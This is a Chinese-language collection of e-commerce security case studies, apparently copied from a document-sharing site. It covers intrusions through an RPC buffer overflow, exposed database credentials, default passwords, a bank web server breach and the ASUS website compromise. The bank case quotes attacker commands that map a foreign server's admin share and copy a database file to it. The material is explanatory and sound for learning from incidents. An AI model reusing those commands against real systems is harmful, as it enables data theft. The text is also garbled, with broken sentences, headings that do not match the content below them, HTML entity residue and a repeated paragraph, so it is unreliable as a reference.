电子商务安全案例分析
在考查“电子商务链”上每个逻辑链条时,为保证安全的电子商务所必须保护的资产包括客户机、在通信信道上传输的消息、WWW 和电子商务服务器(包括服务器端所有的硬件)。电影中商业间谍主要是窃听各种通信设备,如电话线和卫星通信线路。虽然电信通道是需要保护的主要的资产之一,但并不是计算机和电子商务安全所考虑的惟一因素。例如,如果通信连接是安全的,而客户机上有一个病毒,这个病毒就会污染要安全传输到WWW 或电子商务服务器上的信息,这时商务交易的安全就像客户机一样不安全了
对客户机的安全威胁
在可执行的HTML 编制的,WWW 内容出现前,页面是静态的。静态页面是以WWW 标准页面描述语言其作用只是显示内容并提供到其他页面的链接。在活动内容广泛应用后,这个状况就发生变化了。
1 .活动内容
该网站运行于Solaris2.5上,系统管理员经常发现网站的管理模块有不明用户进入,入侵者能用管理员的帐号查看,修改用户数据,查看用户密码
。从6月以来不断有用户投诉密码被更改,邮箱邮件被别人收走。还有的栏目信息被入侵者修改,换成莫名其妙的内容,更猖狂的是,该入侵者居然公然加了一个自己的帐号,并将其设置为管理员。经本站安全技术人员C检查,其网站至少存在2个致命漏洞,一个中等程度的漏洞和若干个配置错误。其中一个致命漏洞在于RPC程序中的一个守护进程。该守护进程的漏洞在Internet上发布已经有半年,但管理员既没有对该进程的程序打补丁,也没有关掉该服务。实际上这个服务是没有必要打开的。这个守护进程中存在一个缓冲区溢出错误,并且有黑客针对该错误写了一段攻击程序,公布在黑客BBS上。该攻击程序通过缓冲区溢出错误可以使入侵者在这台机器上用任何身份执行任何指令。该溢出发生的时候这个守护进程程序报错,这表明入侵者的确是利用这个漏洞进入系统的。该网站上的另一个中等程度的漏洞是finger服务,该服务暴露了这台机器的用户名。本站安全技术人员通过修改系统初始化文件和修补漏洞的工作以后,有效地防止了以后同类现象发生。该网站从7月中开始运行到现在没有出现过有关安全的投诉.
1.借刀杀人,破坏某电子公司的数据库 (2001年2月12日)
时间:1999年11月该网站运行于Windows NT 4.0上,web server为IIS4.0,补丁号为Service Pack5。该网站管理员在11月的某一天发现其web网站上的用户资料和电子配件数据库被入侵者完全删除!严重之处更在于该数据库没有备份,网站运行半年来积累的用户和资料全部丢失。系统管理员反复检查原因,通过web日志发现破坏者的调用web程序记录,确定了当时用户的IP是202.103.xxx.xxx(出于众所周知的原因这里隐藏了后两位),而这个IP来自于某地一个ISP的一台代理服务器。这个202.103.xxx.xx的服务器安装了Wingate的代理软件。破坏者浏览电子公司的网站是用该代理访问的。这件事情给电子公司带来的损失是很严重的,丢失了半年的工作成果。入侵者同时给202.103.xxx.xxx带来了麻烦,电子公司报了案,协查通报到了202.103.xxx.xxx这个ISP所在地的公安局。该代理服务器的系统管理员是本站一位技术人员F的朋友。F通过对受害者的服务器进行安全检查发现了原因。首先,其端口1433为开放,SQL数据库服务器允许远程管理访问;其次,其IIS服务器存在ASP的bug,允许任何用户查看ASP源代码,数据库管理员帐号sa和密码以明文的形式存在于ASP文件中。有了这两个条件,破坏者可以很容易地连上SQL数据库,以最高身份对数据库执行任意操作。对于该漏洞的补丁,请下载本站的ASP bug补丁修复程序。
台湾黑客对某政府网站的攻击 时间:1999年8月
该网站运行的系统是SunOS,版本比较旧。当时大陆黑客出于对李登辉"quot;两国论"quot;谬论的愤慨,为谴责李登辉的分裂行径,于8月份某日,一夜之间入侵了数十个台湾政府站点。台湾黑客采取了报复行动,替换了这个网站的首页。经本站技术人员P分析,在该系统上实际存在至少4个致命的弱点可以被黑客利用。其中有两个RPC守护进程存在缓冲区溢出漏洞,一个CGI程序也有溢出错误。对这些漏洞要采用比较特殊的攻击程序。但台湾黑客并没有利用这些比较高级的攻击技巧,而是从一个最简单的错误配置进入了系统。原来,其缺省帐号infomix的密码与用户名相同!这个用户的权限足以让台湾黑客对web网站为所欲为。从这件事情可以看出,我们有部分系统管理员不具备最起码的安全素质。
案例四:东亚某银行 时间:1999年12月
该网站为WindowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug的非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过Email授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!
至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use * \\xxx.xxx.xxx.xxx\c$ passwd /user:"quot;administrator"quot;),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:\"gt;x.txt 和dir c:\data"gt;x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。
为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:\winnt\system32\logfiles下面。(入侵者删除了c:\winnt\system32\logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在 http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了 copy c:\data\db1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。
最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:\winnt\system32\logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是Domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。
华硕官方网站遭黑客攻击 公司被迫关闭服务器
Exploit Prevention Labs的首席技术官罗杰-汤姆森(Roger Thompson)透露,该攻击代码隐藏在网站主页的一个HTML元素中,并试图从另一台服务器上下载恶意代码。截止周五下午,这台服务器已经停止工作,虽然黑客们还可转移攻击目标,不过此次攻击的危险性已经下降。
4月6日据外电报道 电脑零部件生产商华硕的网站遭到黑客攻击,黑客利用本周才修复的一个Windows系统中的紧急漏洞,通过该网站的服务器发送恶意代码。
Exploit Prevention Labs的首席技术官罗杰-汤姆森(Roger Thompson)透露,该攻击代码隐藏在网站主页的一个HTML元素中,并试图从另一台服务器上下载恶意代码。截止周五下午,这台服务器已经停止工作,虽然黑客们还可转移攻击目标,不过此次攻击的危险性已经下降。
华硕的营销经理大卫-雷(David Ray)不能证实网站是否被黑,只称公司的网站看起来没有受到威胁。 此恶意代码之所以受到特别关注,是因为它利用了本周才修复的一个紧急的Windows动画光标漏洞。瞄准该漏洞的恶意代码已经出现了一个多星期,在安装了补丁前如果用户访问了华硕网站,可能会危及电脑的安全。
Kaspersky Lab也证实了华硕网站被黑,同时证实被黑客利用的网站在周五都已关闭,黑客们无法下载恶意代码。汤姆森认为,华硕网站的被黑显示出,即使是人们信赖的网站也可能存在安全隐患。他表示,如果像华硕这样的大公司都能被黑并感染上病毒,其他网站可想而知。
本文来源:https://www.2haoxitong.net/k/doc/dc323210a21614791711280b.html
文档为doc格式